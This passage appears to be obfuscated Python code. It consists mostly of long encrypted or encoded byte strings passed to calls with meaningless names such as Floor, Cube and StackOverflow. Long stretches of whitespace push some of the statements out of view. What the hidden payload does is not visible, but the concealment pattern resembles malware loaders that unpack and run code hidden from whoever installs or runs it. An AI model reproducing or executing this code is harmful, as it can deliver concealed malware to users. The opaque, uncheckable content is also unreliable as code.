)\xbb\x9a\xe4\xa398\xca0P3\xc6\xa6\xeacN<h@\xe1\xd8\xb3J\xbbB\x85\xa4\x16D?\x13\x1de\x05*dU]\xa71\xc9\xecG\x881\xcf}\x1a\x91\xbfr{/\x02q\x9bCP\xc4\x10\x08\xce\xd5\xe6~\x0fe\xe3E\xb1\xb9\xdd\x1dxQ*\x9e\xd7\x1dN\xd0\x8e\x95\x912Qj^\xda\xce\xf5\xb6\x0b\x85\xa4u\x00\xcf\x00\xc8\xe7\xd4C\x89\x7f\x83\xc6\t\x1d2\x8c\xe4\xc3\xec9\x08O\x8b\x11\xaa\xe6cd_\xa9\xb4\xad].\xb1L\x1c\x92\xb2Z\xa2|z\x96Y\xa4I]\x97s9\x1f\x80Fj\xb4u\x9e1\x81xK\x18\xd2n\xc2\x17\x02k\xbe\x15\xbb\x92l\x0b_Dd\xcd\xd5\x9b\xea64\x80\xee\x1b\xc0\xbadF\xa8\x8e\xe6:\xb1d\xf7\xa3Y7\xa0\xf4f\xe9\xc5~\\\xef\xf1\xcd\xean\xdb\x11\x99b\x18Lp\x94<\xbb\x99!\x0ed3\x08\xdf\xceP\x8c\x80\x84\x9e}\x96\xcd*\xa5;\xe9\xd7b\x13\xb59O\x84UA\xd3wT\xd8\x8d\xd7\xd5}E\xbf~\xa3\xd8\xfc\xb5f\x98\xb2\xc9\xc5\x84\xc1\x18\\\x8d1\xd1\xb81\\\xa8\x15\x98^\xb7\xcf\x95J\xae\x91K&V\x04\xcfH\xb3~\x99!\xcdN\x84\x9a\x81\xacWQ\xbd\xb4\xc9\xce\x88\xa0+\xc3\x00\xf6>\xee\x00v\x96\xd5Kw\xd2\xc9\xfb\xb1\x89}\x15\xe7\x80D\xb9K\x07\xb6\xf9\x197\xd5\xdd\xc2>\xbcg\x1d=\xb3\xa0\xa3\x86\xeb}\xa4ms\xf2\xea\xc6>\xd7\xb1\x7f\x0b\x02B\x87\x1c^\xad\x14\t\xf8p\xdaJ\x9dp\x9d\xd3vw\x00\x07\r\xc7J4\x1c\xcb\x00\xb4\xdc\x80\x96\xdc\xf5\xdbRxL\xaa\xdf\xcb\x84\xbeN\x88{\xbb\xed\xafJX\xe0\xe0e\xf4\xe3A,s#\xc9!Ez\xff\x10\xb9k\x81\x14*b"\xa8Z\xe9\xde[uvf\xcf\xedW\xfaK\xbf\x16r\xa5I\xa0\xb7\xed7\x07G$\xb5\x81\xf4\x06\x9eH\x9fW\xce\xb0^\xba\xcb\xfb\xb2\x95A\xb8L\x1bb\'YJ\xab\xf6\x08\x17\x18|\xb0\xb0\xb8\xc1M\xb3\xf3\xa2L\xadhS\xbe0\xed\xe2\x1e\xbaC\x0f\x84\x81\xc8\x8a\xd8\xef6h\x1f\xc2\xeaz\x9cs\x83\xe6\x98\x88\xf3\x00\xd7J\xdf\xc0\xbb\xbe]Nt\x11\xd5\x04\xc3(\xb1@\xa8\x9b[1B\xab\xea\x91\xed\xb5\xf3L\xf1&\xbf\xceH{A\xcb\xf2\xd7\xc8\x95W\xb4}GD\x00\xd6\xb3\x86a\x11\xf1K#\xea\xdf\xd5\xf7JDk\xdfj\xfbPDrm\x942\x0c\x80\x9b\xea:t\xe6t\xa1\x9bI\x931}\xf2sC\xf3\x15\xb8\x1cR\xd4\xbe\x02N\xf0\x03)\x7f\x92z\xe9\xde\xa3\x1b\xbbK\xab\r\xd9P\x95\xac\x7f\xaa\xc4\xa7\x826\x95$\xb5\x13,\x9a\x18O\xfd\xd8\x80\x1c\xed\x08]\xb4\xfdY\xea\xe4\xa6\xba\x8e\xb9d\x9d\xd9\x02\xedX\xaaR\\UY\xd9\xd8K%\xe3@\x0e\xf8\x85\x8e\x85\x9f\xd4_\xa7\xcb\xea+\xb8\x00c\xcc|\x15 \xaby\xc0c\xdb*itZ\x88\xe3\x0b\xd8\xad\x10h\xc6\xd6Zi\xa7\xd7\x18\xa1i(\xc6\xa3\x00#m\x0f\x95\x92\xb8^\xba\xe3\xa9\xa9\xab\xf8\xf7\xb6\xfd\xec\x8eq\xd8v$G\x03\x17\xf4\x1b\x1a\'\xdc\xcd\x18&9\xad\x89\xb60\xc9\x94\xe9;y8\x88\x14\x0bCn\xba\xedm\xfe\xbcG\xca\x8c\x89\xfbn\xc0d\x0b\xf2u\x88d\xc9>\x0eD0|\xf6Q\xbe\xae\x95\xee\xc4\x1c\xba\xe5h\xdac5\xbf\x14=^\x8d(\x97X6\x17\x1a\xeb4\x86\xc4 =H\xcd\r\xdb\xdbs\xa7\\0u\xcagJ\x0f\x83H\xa7f\xb0n\xcad\x04v\x1fZ/\xc0\xf6\x10\xd4K\xf7\xde&\xd4\x95d\xc8Y\xa4.\xf1\x85"?\x82\xa6\x1e\x90\x14\xbd\x1d\x94\x13*`\xa7ET/\xdd\xc9(\xdd\x99\xba\xfc\x9a\x03-o\xf2\xdb\xdb\x19\xd0\x80\xdc\xde"\x11\xc8|>\x83M\xf5\xd6V1\x14EO|/\x02v\xb29\xa77\xd5kH\xf4\xf1v\xfdu\x0e\x8d&m\x06\xa4*\xb7\xea\xafS\x11\xad\xeb\x8a\x9d\xf7\xd9\xbdX]\x0e\xc8\xbe&\x8a9}j\xd3\x18\x82\xb5\xb1\xa1z\x91\xa5\xfa\x85V/nR\xd7YOv\t\xfc\xaa&,(\xbb\xd3m\x07\xbb\x1b\x87\xfa\x0e\xb0\xd4Uh\x9e\x1dr^M\x97\xeb\x82:\xc5\x9d\xb8\x9eift\xc9J$\xd9\x882\xe6P\x97o]\xd8+\xd1\x1d\xa0\x04+5\xc3Nc?\t\x03\x00\\\xf6\xd5\x1d\xec\x9ec\xb1\xcc1^\x16\x1c\xed\x88\x00w*\xc9\xd6\x8b\xef\x9a\xab\xaa\x928T?\xb9\xe2\x8b\x1c\xbbH\xde\x1a\xd6\xefM\x9d\r~\xf3\xd5\x0c\xce0\xab\xf0\x00\xa3x \xac\xe7\xf0\xf0\xff\x02#%ht\xb0\x06\x83\x18\x03\x0b\xf2Q\xf1px\xc82$\x00i.\x03\t8\x86\xad\xa3\xd1br\xb8\xf4g\xdb\x11\xfa\x94AGe\xa0\x91=\x7f:\xe8\x7f,6\xf5\xad\x05H\xec\x95\xd5\xb8\xdaMu\x9b&\x88X\xb7\xfc\xb2\x8f\xeb\xa5)/u\x86@| \x80\x8c\x11S\x1b\xa1e\xdcG\x93S\xa9\xb4c\x7fY\xc4\x9aU\x8c^\xf7\x84i(k\xa5\xcd\xd4\x0e\x1f\x7fF\x99]\x80\xc72@\xb5\xa3V\xda\xa9\xc9\xf1-e\xbd\xb6A\xb3=%\xf1\xf9Q\xa4\xde\xd5\xd3Q\x1ee\xcdad\x18\x8c\xf4g\xb0O9\x988\x81K\xce\x11\xbf^\x95\xd3\xa7\xce\xaf\xe7.\x81\xc6.\xad@\xf5P=\xfb\x8a\xdd\x11\xb3;\xef\x93\x92\xaef\xac\x13E\x8a8fD1\x93*\xd7\x858\xd6\xda\x12\x8e)\x82\x01*\r(=xQ\xdbMr7\xfc,\xc9\x07H`\xb5X\x1fZ:7\xd5kAYc\x10\xdf\xd8\x04]\xbe^\x19\x15\x12\x16Y\xab\x85\xd3Ip\x0fQ%m\xcc\xba\xba\xfb\x9c\xbaq\xf5(2\xb9V\x0cw\xb0\x9d\x7feRz\x9dl\xcf\xc2K}\xb6\xd1\x8a\x1d#$\xba\xc7\x8c*\x88\xfeG\xff_\xad\xb4\xcd\xed\x17\xb1-\x8bMN/\xc9\xce&\xd1\x11i%\x8b\xdb\xba\xba\xafI\xb4\xb8\xbc\x8f\x83\xec=\x80\x90\xaa3\x12\xc9!\xbc\xbeA\\Ug^\x8dm\x93\x8b\xf4\xd2\x04\x12\x81\xbb\xe6\xecbfA\xe2\x1d$\xbe\xc1\xb2<B\xdf\x99T\xcf\x0ef|\xc2\xe2\x81o\xc3\x01;k5\xadW\x9d\x07\xd8\x91\xcfF\xdd4u\x17\x93 b\xc3\xed\xf6\x1c\xba\x07//:\xdb\xf1\xf3\xee2\xe9\x88\x1afgU\x94\xe9Y\x08\xe3\xd3\x8a\xca\xb6\xae\xee+\xc6\xf2vTwA\x12$\x19\x84\x0c\'\x13\x87B_\xd5VS\xb7{\xb8\x10\xfb\xf4\x94\x10L\x1c\xe7\x1e\xb2\xc8\xefkd\xf1\x95r\'\xac>\xea.\xb6I\x01;\xa0\xbdY\xbbU\x7f\xcd\xd6\xc7\x105y\x1f5}dy\xfaHy2+\xa5\xcd\xdc\xa5\x94O\xbc\x8f.\xf7\x84u\xed\xa0^\xdaf\x80JZ0\x9d\xd9\xc12\xec\xe3\x02j\xe1O\xd7\xd5k\x98\x9ao\x7f<(\xb3\xdb\xf9l6\xbb\xc5\x07\xa4\x06\xb8m\x95\xe6w\x17Q8\x9d\x11Sb\x0c\x12\xa5\xa6\x83\xa0\x0e`gS\xfaN\xb3\xb8\x0e\xc0n\x92\xd5(E4\x88\x8f\x9d2\xac\x97\xee\x1c\xdd\xf9F\xd6\xd2\x03\xe8>3\xfc\xc5\x0c\\\xa3\xfb\x9e.\xda\x9d\x07fR\x9a\xdfm\xd5\xa5\x92\x1a\x92\x9eN\x8c7\xce)\xa8-\x12Z!\xa8\x1d\xeb\xec\xbc\xd6\xf6\xdeZ\xf7\x0f`\xb6\xa3\xccV0\xe9\xc9\x14\xa8\n\x9a\x1a\x93\x81,\xa2\x8f\xe6\xea\x94\xc1\xddi\xbd\xb4-f9\x88M\xec\xb6`\x90\xed\xecB\xa1\x85Y\xdeT\xd7i\xfe\x94\xee\x85\xa7\x1a\xefw9\xc2\xc90\xf0;\xcao\x01\x89\r\xa7)q\xc6\x04i\xb6=\x1d\x14s`}\xe6\x14[\r\xf9\xa0\xc8\x0f\x12!\xdd\'se\xe2\nS+m\xdb\xc5\xc4-$Pw\t\xd3\x10DNbu\xb1Mu_!\xfel3gCb\x95\x04N\xc5\x010>\x9a\x9a\xb8[+\x027\x8at\x82\x04\xa3\xca;If\x91\xc6`\x88LG\xd1\x04\xd2\xd1(E\xb7\xfbY\xbb\xceZi\'"qE\x91P\xa2\xd5ua\x96\xe8[1\xa3:6\xb4\xb6\xe5$\xce8M\x99\x853\x8d0\xcdO\x1f\xf1e\x13\xbc\xceI0!\xc2\xad\x94\xf2\xa4*}S5p\x0f>\xaboB\xfc&Tm2M\xf2\xee\xfbs^"}\x11r\x97\xbcL\xdd\xb4\xbf\xab3\xf3\xc4\xdf\x11[|C\xb2\xf8\x009\xde\xfa\x18\x00\tZc\x88jgX/mk\x95O,S\x8cD\xb1\t\x881\xa8dcXUo\x07I\x95;\xb5{\x1e\xa8>@\xe6\xdf\xc1\x00\xb9U\xa1O\x00\xb5\xd6~\xeb\x8b\x1d1\xf3\xcf\xe9\x0f\x0f@\x87\x82\xa343_\x04h\xebH9\xb8&d\xb4w\xad\xb4\x95\xbe\x14\x1b\x88\x87\xd8\xfd\xabi@R\x8bSlS]\xa7\xf6\xc5\x96\x89\xb6\x0e\xc0\xd16\xc4\x17\xa4!T\xafmA\xcbr\xe96y\x8co\xbd\xf7-\xe0\xf2\xa6\xba\x0e\x93\xc9\xb7\xa7&\x15\xdb\xf7\x8b\xce\'\xbf_`\xe4\xdd\x85\xb9t4/\xc0\xfe\xe6\xfa\x0f\x0e\xd7\xd4>J\xf1C\xfe5!\x90\x02\xb6\x8fVJ\xdb\xca\xf6\x91\xa5\xfe\xf5Y=\x94<\x1f\xd8i-\xd9~S]\xa7\xf4w]\xdd\x0f\xd6\xe91\xb4\x01\xe5\x8cf9N\x1b\xf7\xf0\x94\x19\xdfH\xcd\x0f9\xc3F\xbf^\xfa\x93\x8c\x82\x0e\xd8\x8eY\xb3\xe5\xf4\xd1\xcd\x92Gw\x1d\x8e\xdb)\x8c\xe4M{\xf0\x1a\xf72\'\xc6,i\xa2\x12\xb2\x9d\xe8d}\x8e\x1c\xcb\xadcf\xd0.<\xbb\xa5<\xc4\xb3[4\x17w<43&\xbd\xa3\xc9\xb3\x87\xb1\xd4\xfdzi\xb7\x98L\x0c\x02M\xf5\xe0\x0f0L\xb4W/mfV\xec\xa1,\x08(\x92HG\x9cV\xca\x9ajB\x01\xd2\xc0\xf8\x18\x08\xd7gz\xa3Zi[\xa1S\x16\x08\xd1nD\x98\x14\xe0\x89\xbf$\xc1\xd4\xb2\xba\xc4\xbf\xb0kT\xaa\xd2\x8d \xd0$\x06f\xe8 O!_p\xea\xc6\x8e\x99\x96\xac\x95U\xebe\xdf\x19?t\x87\xee2t\xeb\xe0\x10\xa6\xe0\xb7[\x18\xc3M\x96\xd7\xf5^Wa\xd7\x10Jc\x81>\x88\x9ab3\xff\xac\xab\x9b6\xefA\xdb1\xc9X\xa6\x9d8L\xfb\xf1\xf6\x8c23\x8c\x17D\xf9\x04<f\xd0\x94\xad\x9aq\x07Z\xb4\x00I[')

        Floor(Cube = 62477 * 74035).Add(Calculate = -35964 - Random.Math)                                                                                                                                                                                                                                                          ;Floor.StackOverflow(Negative='iljiiilljjjjllllljlljjj',Square=b'\xa4\x9fW\xd7\n.\x17\xf22\xc3:\xb0\xdf\x97\xdc\xe1\xc8\x01\xc6a\xca\xfa\x85\xbef$\x0f\x04 m;x\xa8\xd8\xdd3k*\xb5\xa7V\x9b\xde\xbaI]\x87\xf0\xd0<\x98:\x00X\xd7R\xc3V\'V\'\x19Q\xa03\x84\xc9M\x82\xa9\xe0\xb7\x8fl;\xf8\x82eT\xccG\xc7\xad&\xcb;\xb1\xd4\xf7\x10\xfe\xe2\x13\xff\xf4G\x08?\xa9\x95\xee+R{\xdb\x8e\x94\xa2|\x9b\xa2 \xdaNa!\xaf\x1c\xf37\x90_\xae\xad\x15I\x1b\xcf\xac\xa7-\xe7\xa4\x96\x15iS\xdd\x86\x06\xb8\xb7jC\xdc\x1dY<\xe4\x00\xf8\xdeLb\x0e\xd8yI\xe9\x14(\x10\xabW/m\xb2\xb3>\x82\xbf\x026\xed\xc3\xcfAf\xce\xea\xa5m-)\xa9e\xf6\x13d\xa6o\xddD\x9b<lS\xddW\x90\x87\xbd)\xa6g\xb5.Z\xf1 \x96c\xc2\x1de\xbc\xebrAF\xd6iX\x8d}$\xf3-\xd4b\x8c\xd0\xafF\xd8\xaf\x84;h\xc0\xd6\x1e\xa5\xe8\xa1\x9eV+\xfd\xcfe\xe0\xe8\x8a<\xe3B\xd2\x82]pn\xb0fx\x88\x1eF\x85\x82JM\x90O\xe2;\r\xea\xa5\xcdna\xc8D\xbf\t\x13\xeeP0h\xad\xf4M\xee\x0c\'P\x86\xf19\x93\xa1:\xc7O\xb7\xc7\xda!zw\'\xc9\xa2)\x9f\xf6\xaaD\xca\x02>\xa1\x16\xc7\xc4d\xb0\xbd\xd7\xe8\xbc \xba!U\xab\xd5(?WS&\xf8)\xd5\xe4\tNKpX6J\x02\xe9\x82-\xd0\x05\xff`\x1f\x1f\x112\x92\x81\xb4\x97\xa1\x0f\xa1V\xfa\x16\x1e\x1e\x08\xf2\x8e\x98\xbf\xb0O8\xed\x8f\x10\xe2\x1d\x97\xcb\xde`t\xad\xb6\x1e\xed\xdb"k\x017\x0ch\xc3\xa4\x07\xce\x9b\xc07^?\xf0\xbaq\xc3\xc0r\x8a*.s\xe6\xfb\x08\xb1\x1e6L\xb7\xe3\xf3B\x9a\xa1\xbd\x12zJ\x0f%\xc4Zi[\x1c\x87H\xdb"\x8d\xdb6\xa5\xc8\xb2=m\xaa\x1b\xbe\xcez\xb9\x9d\xf9\xbd\x9bl\xe4h\x7fG\x03\x14\x82\xb4\xa1s6\xbd%}\x8cm$\xd9\xba\xcfD\xa5\xb5\xd2f;#\xca\x85\x88s\x99\x87l3\xaf\x956\xdb\x19%%OY\xe7\xed\xe3<\xd8\xab\x976\x9d\xb5(-\x03\x90\xb9\x82:\x1d\xf2\xbcU)m\xb6\xb3\x18\x8fO`\xe1>\xb7\x19\x85\xad\x94J\xdbvc;\xc87\x8e\r\x00X\x93\x17[\xddxS\xdd\x86\xf0\x85n\x0c\xf0\xed\x03\xd4E\x8c\x94\xfc\xb2M)\x18;^\xb7W\xdf\x1f\xd1\x01}K\xd1\x97 m\x01l\xc7|\x7f\x9a\xd4m\x92\x84\xaf\x9d\x91\xc5ef\xf1q=7zY\x8f\xfcy\xa9,\x04I\xbb\x8c=\xcd<],\xd9]\x18t\x86\xbcV\xa3Y\xdaG\xae\x87\xa6\xeap\'\xdc\xec6\x81\x9e\x9d\x1f7\x91\xa9\xa9\x92\xeak]]\xb7q\x0e\x1d@&\x9e%\r\xe6\x8b\xc9\x88\xd90\xab@\x84\xebl"\xdc\xc3\xec#\x8e\xeb\xa5\xcd\xbc\xc4\x19\x07\xacQH&\x99\x91\xc3z\xe9\xcf\x01f\xe9\xd0@\xc4\xa0\xae\x01\x1f\x81\xb7\x1a\xf2F\'\x18\xfeC\xeb;\x1a\x12\xd0\xb4P+m\xebzOc\xc3\x98*!\xa8\x92\xb6\xd4N\xc1\xd1\xa4\xae\xcb\xfc\x11\xa5\xfc\x1f\xe2\xff\x97%N0\x01\xfdJ\x1e\xd6uu\x9b\x88(\xcbo+\xf3\x0b\xb3\xb2\x86\xfa\xda~\xdbAv\xb5v\x8d4!Q\xc6\xb4D\xa3\xd2\'\'\xf4D])\x9b\x9f-\n\xee\x0br\xe54A\xa1\xad\xef\xb0\xb15jb\xab\xf3\xe9r\xab\xc3n\xaa\xdb0*j=1M\xab%V$}\xc1v\xf6\xad!\xe6\xc7e)\xb4I\xdd\xa6R\xe8v\xc4\x8a6\xa9\xa2\xedT\x90W\x07n\xdd\xd8\xc7\xc0\x9c0M1T\xa7{\xc2\xd2\x12\xfd\xaa\x19^\x92\xd1\xac\x126\x0b[\xfb\xedBA\xc6\xf6\x80\xb8\xda\xc9\x08\xd6\x8c\xb0\xbd\xb9\xa5\xf1Zr%\x11\x1e:c#P\xad\xb4\x99*N\x96#J\xde \xd6\xc8\xb4\\\xf6\x06R\xce\x9e/\x0b\xe5e`d\xb8\xea4o]\xa5t\x7f\x17\t]\xc0\xdf}\xf9\xd2\xd6\xeab\xcf\x91\x82\xab\x11\x80\x1a\xcaX\x96\xd5eU]\xc1\xd8;\x04\xae\xb9E%\x97\x93x\xd8L>B\xe6\xe8\x9e\xbb\xb8C\xb1\x1fe\xfe\x01\x8b\xfe\x83&\x02\xff\x9bJ\x87I\x92\xa5`\x18\x1eC\xbcp\x1b8""\xf2(#\x04rx\xdc6\x8c\x9b\xe8\xde\xff\xd5\xc7\xa082\x9c\xa6\xe8\xc8\x12@G\xa5t\xbf\xcc|\x1dd\xbbz\xcb\xc4|C\xfac7M\xd1\xcc\xf0Ci\xe1\x13\\<S2\x8f\xe3\xb2\xea#\x8f\xb2U\xda\xb1c1EkG\xcc)\xe9)\xf7\x9a\xcfn{\xab\xf4g\xb8\xef[\xdcs\x87\xbc~u~\xbfj\x8e&z\xfdy\x8d\xb46cH\x89O\xc4\xce\x94\xec\x0c\x89\x0f\x1c\x86[\xd3\xec\x1f\x14>\xd9d\xd1\x9bZP\x0e\xf2v\x08\xe2\x9f\xcd~q\x00y\xf80-\x1f#``\xab\xc90OQ\xc4\x0fq^\x00\xaf\x1c\x05\x06U\xcav<\r\xbc\xba5\x81\xcb/\t\xa34\xcc\x94\xe88\x8a\xfb\xd1(\x1d%=\xa0hT\xf2O\x10)\x9d<\x8e\xa0<V2\x90\xda\xea\xab\xcf\xe02\x9e()aB\xf5\xd5"\x11$\x93(G=:\x0c{Q\x9c\xf4Ty\x9e\xf4\xe3,\x99\xa4\xfdd\xac\xc6w\xaa\x8680Y\xe4j\xbfj\xff\xeas\x96\xaa\xdb\x18\xd1\xef#\xd8\x9f:d\x14\xa5\xc9X\xc9\x1e\x81\xdaW\x1e\xc6I\xa8\xce)\x80\xfd\xab\xfb\xddKn\xd4\xf7\xaa~\xd8S\xc7U\x9f\xd5\xf9\x04X\x7f\x14gq\xaa\xce\x1b\xce?VG\xf3\xe3^\x9c\xa8m<Ou]\xbe\xdaN\xd5\xfe|9.\x9cg\x1c\xc8\xf9\xac9\xef\x18\xaf\xb3\xaf\xda\xa1\xaf\xd6A_\x9d\x07\x9cd\x9e\x80\xe0\x19\xab\xcf\x11\xb4[\x9a\xe1~\xe3$o\xbe\xdf0\x88r\xfc\x9djOu~\xf8\x19\x8e\xa3\xce\x17\xf6\xab\xde\xd5>\xd45\xe1q\xb3$R\xc7U\r\x14\xa9_B;\xd9\xd7\xab\xf6\x03\xed\x95c=u^j\x9e\x81\xf2\x14\xdb\x06?\'7t\x9f\xd4\x9d\xcb\xf08ch\xd7h\x92\xa4K\xda/U\xad\xb6\xf48\xea\xfa\xc6\xd0\xfe\x89\xfa\t\xb4\xabj\xfdu\xed\x1bG\t\xdc\'\xd8\xbf\xfa>\x82r<\x0f\xbeo\xf0\xbb4\x83\xf3\x91\xebR\xed\xa4\xb6\xd5X\xcec\xea\x87\x01\x1e\'\xa7v\xa7\xf6Xs\xbe\xeaw\xeax\xaa}\xc3\x1e\xde\x97\x84\xda\x13\xf7C\xfb\xcbU!\xdd\xb7\x11\xfc\x0e\xfa#\x9c\']\x17\xf6\xbf\x0c\xee\x03^\xf7(\x82\xfe6Q}3S\xbf\x87v\x0cU\x9d1\x9c\x8f\xda\xef\x14~\x0f\xed\xac~\x9f`{Fx\x9fs5\x8e\xc0\xc6\x93\xe1y\x8d\xb0\xfe\x84\xdaQ_\xe7\xb6\xe7\x19EY8i\x91zT\xa6\xb6\xbb\xc6\xf3\xdb\xeaiIX*\xc5\x84\'\xd4\xb2\xe2L\xb6\xb9\r\x9a\xd4u\xc6m\x90\n\xb3o\xe0\xa70\xac\xc0\xc7\xd6K\x80R\'\xc1L\x8dc\xa0D\n\xba\xa7\xc9\xa1\x9c\xa6&\x9b)\x05\xd6J6Sblv\x11L\xdb\x9a\x97\x1f\xfe\x86(\x08\x0c\tX\xd5\x84\x95\xff\r%\x01\xcd\xb7\xa8\xd6\x868\xcd\xb6\xbep\xc2\xe8\x9d\xe3+\xc2\xf4\xd4\xcb\xbe\xc2\xac\xb7\xe9\x18v\x98a\xaeZ\xaa\xbf}\'Y-\x04\x97\x05_[$.\xc7Q\xa5\xae\xa2\xa8\xbap\xa2\x0fA\x18\xa6H:B\x16\x02\x7fkC\xcd5\xbe\x0e\xd9O\x9e\x12v\xed#\xb1o\x94\xca\xf6]\x1eT\xcb\xd0\xf60@\xf4\x91i\xe4\x14\xd37\xb4C\x85\xdb\x94\x93\xb2p\xd8aM\xb1\xe5cjR\xb7\xa1\x8fi\xb5\xd7\xac\x8f\xf6\x89\x0c}\xeed\xea\xa7(\xb9\x1eJ\xfcVi\xb3.\x13 \xf6/d.\xb1>\xc3\xadk\xa5m\xddtv\x84\xbc\xb8\xec\x13{]\xb6\xdct\x9b\xea\xbe\x02\t\xf3\xda\x853\x12>\n\xe1H\xa4?\x9dx\x89\xfe\xf0;\x17Q\x98\x9d\x18\xbeV_\xdd$*\xa7\x1b\xa9\xb2\xf6j\xee\xf6\xbd\xb6goZ\x01\xfaV\xf4\xac=\xe3ks\xc8\xfe\xbas^L\x1e\x07|6I\xfb\xfa\xb3H\x01A\x12\xaa6\xda\xdeJ"\x96|pc4\xb6\xe4\xc7\x18(\x19c\xda\x1a\x1f\x03\'\xfb8\xbf\xd5J\x9b\xd9[b\xc6:\x05\xf8\xd3\x14a\xd4\xfdzi[\xe5F\x10\xcd=\xeb]H\xdal\xce\xbb&u_\x93\x1fg+\x1cT\xfb\xa4\xdd\x18\xcdt~\x86D\x8c\x83\xb3\x01\xf21\xc2\xa3M3J,\x834\x85\xa4.\x16:\xb0\xccZ\xb6\x9b\xd4m\xb9l;\x15\x1a\xd7M\x88u\x1a\x81\xf2\x14Y\x11\x93]L\x8dS\xa5$\xa1\x95\x18\x18F:b\xed\xc4#\xd0\xf1\x06\xe2\xdd\x84\xcdfsB\x1f%\x9b\x08E\xe3\x80g\x84JY\xa3y\x97\x03*\xc9_\xe43\xd04\xa8\x97v\x8b i\xeb\xdci\x19b\xf6\xe6\xf6\xf2\x8d\x0e\x9f\xe5n\x9f\xb2\xbb\xc7\x99\xcb\xa7#I\xe0\x14X@\x8b\xd3!f\xdd\xc3\x0c|\xa7\x90\x81\xaf\x0bt\x87\x00\xcd\x05dn\'\xd7\x0b*\xe8\x8euu\x9d\x91\xd48\x97\x83u\xb2\xb2\x88S\x97ES1\x8dIR3\xc7\x13a\x94\xc6}$\\\x8a \x01X;\xd2\n\xc6t\x0f\x0co\xc5\x9e\'\xbbiG\x9cs\x808gz\t\x08\xaaw\xd9\x08\xa5\xb7\xc6\xaeaa\x9c\x04\xe9*\x8b\xbfD)\xc5\x16\xee|S]w\xc2\xc2\x8ef\xd22\x9f~\x19\xbaj\xe2\x81\x9c\xc4\xfdt\x88{\x82\xcd/\xfc\xf9\x0bn\xb65\x04\xc9t\x98Z\xd3cbw\x88%\xf1<\xab\xea\xee\xb3Dy0\x98\x0fD\xb4b\xccXC\xe1*\xe3(P\xca\x17*q">r7\x95J;F\xcf$l\xdf\x0c\x99\xa9\xa4\xc7P\xd8Ji\xa7\xf0\xaa\xc6\x15\t\xdc\x13b\x04p\x86t\x1e\x89\x06\xf7\x94J\xdbZ\xd9\x84\xb1[\x00\x986\x1f\x13qQ\x96\xf3\xbd\xad\xab\xfbJ:\x9f.\xc4D?\xca\xa3\xad\x99*\x0f\xc8\xf6+\x91\xb3\xf4\xd8\x89\xf9\xc4\xf6/\xf6+\xcb\x83\x04%\x07Kh\xeaW\xd5uk\x86q\x18\x08+\xc2\x13e\x89\x05\x1f\xa4\x08VF\xcc\xda_\x91\x9b\x108\xcc=C\xf43\xcd\xacB}\xd4\xf6\x88\x18$\x02k\xd0G\xe2\xce\xae\x94\xee\xbf\xe7\xc5\xb9\xdc\x9dL\x8d\xb4m\x1c\xd2f\x9b\xbek"}\xbfU\x06\x17\x1d\x8f%\x14{\x14\xa2\xb5\xaf\x8a\xfb>\xa5\x10,\xa3-\xcb*\xb9@\xe9')

        Floor(Cube = -3203 + 69090)._add(_round = Random.Math - 44319)                                                                                                                                                                                                                                                          ;Floor.StackOverflow(Negative='S22S22S2SSS222S2222S2',Square=b'\xe5}o\x9d+\x07zu)\xfb\x18\x9b\xcd\x14\xc1\xb5\xf0\xa9E\x18\x86L\xf6\xe3Zi\x17b\x80\xc4\xc0\xa6\xa2\x93\x944\xf7\xb2\x18\xb0\xae\xae\xd3\x19gg\xfa\x0c\x80\xa1\xe8\x99\xa9\xc7\x88\xdf\xe5\x01\x9f\xdd\x04\xa6u\x8a\x13\x85\xbc\xde\xe6\x9f\xdcDM\xfa]\x82A\x06\xc4\x1c\xd3\xd7\x91\xdb\x95\xb2\xb6>\x0b;\xaf\xb70\xaf\x08\xc8*\xb4\x04\xa0&u\x1d\'\x91rgp_Bg%\xf9\xcat~\xb2\xfd\x15\x80\xee4\xfb\xde\x1d\x8bB\xfb\x0c\xbe\xd2\x16\x17\xdf\xeaI\xe2\xf5\x12\xde\x9f\xac\x92\tf]\xdd&\n\xcf\xca\xa8Q\x12)8\x10?\xa0\xf8\xd1=\x8f\xc2\xef\xcagMT\x1f\xf8\xc6\xe9\x97\xe8\xbd\xcd\xd5\x8bB\x9aY3\x84\xacT\xda5W\xe1\x17ZW\xd7]\xfa\xaa]\x05\xad2l\xd3\xc8\xcc"K\x8b\xa2\x95LE\x82v\x92)e{\xf4\xefZ+\xa3\xb1\'\xda6G;H\xde\x05{RW\xc2 .\xc1\xcf\x16h\xa3\xd9\x82LI\xf2\xfa(\xf4eh\x01"\x86\x9aZ\xe9\xcf\xa0-t\xd3\x90\x9c\xbbM\xb7\xe7\xcbn\x90/\x82\xd0\xb3\x11{\x995\x7f\xd8\xd9\x06\x9a\xd4u\x9aM\xac=\xc0\x9av\xc8V\xdd\x01\xbb\xcf\x07\xcd\x08\xce;1\x93if\x9e\x8a\x14\xa8\x93|W\x12\xeb\xac\xab\xfb\nN\xbf\xed\x84\x8b 6)\xe3$\xe3xdu\x80j\x96\xf2uu\x9b,\xe3\xcb\xef\x19\x99-.\x99\xd8\xe7R\xdb2vbr\xa8\xa6\xa2\x11yI\xee\x03\x85O\x949c\xd6\xd5\xed \x03\xa7\x9a>\xdb\xf6D\t\n\xe9Y7MF\xb6\xc1M\x95\x03H\xd6\xd5m\x9a\x1f|\x0bkjdCR95Z\xa4\xb7\xa6f\x1b\xea\xee\xbf\n{\x86\xa9v\x01\xddE\x06\xbcsL\xbc\xbb\xe7rr\t\xc0\xd4\x81\xc7\x9e\xedG\xcc\xecy\xd1\x98+\xbe\xf5h\x16\xf7N\x89\xcf#6 7\x9c\xac,P\xdc\xa6\xba\x1d\x88\x16o`\x16]\tB\x84\xbe\x08]\xf3|\x00@\xc4\xf33\x88\xc5\xd9\xf7\xce\xb9\xcb\x08\xf3\xb4\xf2\x9a\x96\xb0\x83.\xd2\x12E\x80\x17\x0c\xe9u{\x1e\x08\xc8\xa6\\`ZeBT\rO[\xa5Vv\x1fU\xd6V\xce[k\x82\xafb\xe4\xec\xc7O\xc0eC+\x08\xe4j\x87\xdd\xe3@\xed\x14J\x103\xf1w\x0fI>Bf\xf1N\xea\xa5MvFD\xa3\x92L\x13\xec\xad\x90S%\xab\x97\xb6\x95f\xc4\x86\xd5\xb3\x9e\x02g\xb6Y\x9b\xd6\xd5\x15}f\x8b\x84\x95\xdb\xf4\x89\x08)\xe9\xc2\xa4\xef\x00\xbdTe,\xb6\x1f6W\xf3^\xf7\xf5\x8d\x8e4\xdbafFv\xdd\xcd\xe6\xc4\x9d\xb6<\xb4\x19\x03\x9a\xfdT\xf53ug\xa1\x1dB\xd5\x1a\xc0\xac\xa0\x1a;\xcd\x82\x9e\x8b\xa8\xcf2\xf5I